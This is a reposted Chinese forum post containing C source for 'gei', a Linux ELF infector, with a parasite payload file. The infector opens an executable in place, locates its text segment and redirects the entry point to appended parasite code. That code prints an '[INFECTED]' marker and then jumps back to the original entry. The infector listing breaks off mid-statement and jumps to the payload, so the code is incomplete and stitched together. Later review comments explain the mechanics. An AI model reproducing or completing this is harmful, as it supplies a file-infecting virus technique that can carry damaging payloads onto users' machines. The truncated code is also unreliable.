
[转载]gei ELF Infector v0.0.1

[转载]gei ELF Infector v0.0.1

文章作者:grip2


[code]/*
* gei - ELF Infector v0.0.1
* written by grip2 <gript2@hotmail.com>
*/

#include <elf.h>
#include <fcntl.h>
#include <sys/stat.h>
#include <sys/mman.h>
#include <stdio.h>
#include <unistd.h>
#include <string.h>

#include "gparasite.h"

#define PAGE_SIZE 4096
#define PAGE_ALIGN(a) (((a) + PAGE_SIZE - 1) & ~(PAGE_SIZE - 1))
#define TMP_FILE "/tmp/.tmp.v"

int main(int argc, char *argv[])
{
     int fd = -1;
     int tmp_fd = -1;
     Elf32_Ehdr *ehdr = NULL;
     Elf32_Phdr *phdr;
     Elf32_Shdr *shdr;
     int i;
     int txt_index;
     struct stat stat;

     if (argc != 2) {
          fprintf(stderr,
              "gei - ELF Infector v0.0.1 written by grip2 <gript2@hotmail.com>\n");
          fprintf(stderr, "Usage: %s <elf-exec-file>\n", argv[0]);
          goto err;
     }

     fd = open(argv[1], O_RDWR);
     if (fd == -1) {
          perror(argv[1]);
          goto err;
     }

     if (fstat(fd, &stat) == -1) {
          perror("fstat");
          goto err;
     }

#ifndef NDEBUG
     printf("file size: %lu\n", stat.st_size);
#endif

     ehdr = mmap(0, stat.st_size, PROT_WRITE|PROT_READ, MAP_SHARED, fd, 0);
     if (ehdr == MAP_FAILED) {
          perror("mmap ehdr");
          goto err;
     }
     
     /* Check ELF magic-ident */
     if (ehdr->e_ident[EI_MAG0] != 0x7f
          || ehdr->e_ident[EI_MAG1] != &#39;E&#39;
          || ehdr->e_ident[EI_MAG2] != &#39;L&#39;
          || ehdr->e_ident[EI_MAG3] != &#39;F&#39;
          || ehdr->e_ident[EI_CLASS] != ELFCLASS32
          || ehdr->e_ident[EI_DATA] != ELFDATA2LSB
          || ehdr->e_ident[EI_VERSION] != EV_CURRENT
          || ehdr->e_type != ET_EXEC
          || ehdr->e_machine != EM_386
          || ehdr->e_version != EV_CURRENT
          ) {
          fprintf(stderr, "File type not supported\n");
          goto err;
     }

#ifndef NDEBUG
     printf("e_phoff: %08x\ne_shoff: %08x\n",
              ehdr->e_phoff, ehdr->e_shoff);
     printf("e_phentsize: %08x\n", ehdr->e_phentsize);
     printf("e_phnum: %08x\n", ehdr->e_phnum);
     printf("e_shentsize: %08x\n", ehdr->e_shentsize);
     printf("e_shnum: %08x\n", ehdr->e_shnum);
#endif

     /* Get program header and section header start address */
     phdr = (Elf32_Phdr *) ((unsigned long) ehdr + ehdr->e_phoff);
     shdr = (Elf32_Shdr *) ((unsigned long) ehdr + ehdr->e_shoff);

     /* Locate the text segment */
     txt_index = 0;
     while (1) {
          if (txt_index == ehdr->e_phnum) {
              fprintf(stderr, "Invalid e_phnum, text segment not found.\n");
              goto err;
          }
          if (phdr[txt_index].p_type == PT_LOAD
              && phdr[txt_index].p_flags == (PF_R|PF_X)) { /* text segment */
#ifndef NDEBUG
              printf("text segment file offset: %u\n", phdr[txt_index].p_offset);
#endif
              break;
          }
          txt_index++;
     }     

     /* Modify the entry point of the ELF */
     unsigned long org_entry = ehdr->e_entry;
     ehdr->e_entry = phdr[txt_index].p_vaddr + phdr[txt_index].p_filesz;

     /* Get parasite code size */
     int org_code_size =

parasite_code例子
代码:
---------------------------------------------------------------
/* gparasite.h */
/* NOTE(review): identifiers beginning with an underscore followed by an
 * uppercase letter are reserved for the implementation; a plain
 * GPARASITE_H style guard would avoid the collision risk. */
#ifndef _G2_PARASITE_CODE_
#define _G2_PARASITE_CODE_

/* Presumably the byte offset, inside the compiled parasite_code(), of the
 * 0xAABBCCDD immediate that gparasite.c pushes before its final `ret`;
 * the value is tied to one specific compiler output — TODO confirm. */
#define PARACODE_RETADDR_ADDR 99
/* The payload routine and an empty end marker placed right after it;
 * the distance between the two symbols presumably gives the code length. */
void parasite_code(void);
void parasite_code_end(void);

#endif
---------------------------------------------------------------
/* gparasite.c */
/*
* A parasite code sample in C
* written by grip2 <[email]gript2@hotmail.com[/email]>
*/

#include <linux/types.h>
#include <linux/unistd.h>

/* Legacy Linux inline-syscall macro: expands to a function `write` that
 * issues the system call directly instead of calling libc.  The _syscallN
 * macros are no longer shipped in current kernel headers, so this line does
 * not build against a modern toolchain. */
static inline _syscall3(int,write,int,fd,const void *,buf,off_t,count)

/* The _syscall3 expansion reports failures through a global errno; it is
 * defined here presumably because the payload is built without libc's
 * <errno.h> — TODO confirm. */
int errno;
/*
 * Payload routine for gei.  The infector's main() (above) re-points the
 * host's e_entry at the end of its PT_LOAD R+X segment, which is presumably
 * where this code is copied.  At run time it writes the 12-byte marker
 * "[INFECTED]*\n" to stdout, restores the registers it used, unwinds its
 * own frame by hand and transfers control to the address patched into the
 * `push` immediate below.
 *
 * Everything here depends on one specific compiler's frame layout: the
 * hand-written epilogue and the byte stores past `str` are only correct if
 * the stack looks exactly as the author observed.  Claims marked TODO are
 * unverified from this file alone.
 */
void parasite_code(void)
{
     /* s aliases str; the twelve stores below overrun it (see note). */
     long long str2;
     long long str;
     char *s = (char *) &str;

     /* Save the caller-saved scratch registers that the write() call may
      * clobber; they are popped in reverse order in the second asm block. */
     __asm__ __volatile__ (
          "push %%eax\n\t"
          "push %%ecx\n\t"
          "push %%edx\n\t"
          ::);

     /* The marker is assembled byte by byte instead of from a string literal,
      * presumably so the routine carries no data outside its own code — TODO
      * confirm.
      * NOTE(review): str is 8 bytes on i386, so s[8]..s[11] write past it.
      * This relies on str2 sitting directly above str on the stack, which the
      * compiler does not guarantee — it is undefined behaviour and may
      * corrupt other locals under a different build. */
     s[0] = '[';
     s[1] = 'I';
     s[2] = 'N';
     s[3] = 'F';
     s[4] = 'E';
     s[5] = 'C';
     s[6] = 'T';
     s[7] = 'E';
     s[8] = 'D';
     s[9] = ']';
     s[10] = '*';
     s[11] = '\n';
     write(1, s, 12);   /* raw syscall wrapper defined by _syscall3 above */

     /* Manual epilogue: restore the three saved registers, discard 0xc bytes
      * of frame (presumably the locals/outgoing arguments — TODO confirm
      * against the compiled prologue), restore callee-saved ebx and ebp,
      * then replace the normal return with push+ret to the placeholder
      * 0xAABBCCDD.  gei is expected to overwrite that immediate with the
      * host's original e_entry (org_entry in main); PARACODE_RETADDR_ADDR in
      * gparasite.h presumably is its offset.  The push-immediate+ret tail is
      * also a simple static signature for anyone scanning for this payload. */
     __asm__ __volatile__ (
          "pop %%edx\n\t"
          "pop %%ecx\n\t"
          "pop %%eax\n\t"
          "add $0xc, %%esp\n\t"
          "pop %%ebx\n\t"
          "pop %%ebp\n\t"
          "push $0xAABBCCDD\n\t" /* push ret_addr */
          "ret"
          ::);

     /* Never reached: the `ret` above leaves the function.  Presumably kept
      * only so the compiler treats str and str2 as used. */
     str = str2 = 0;
}
void parasite_code_end(void) {}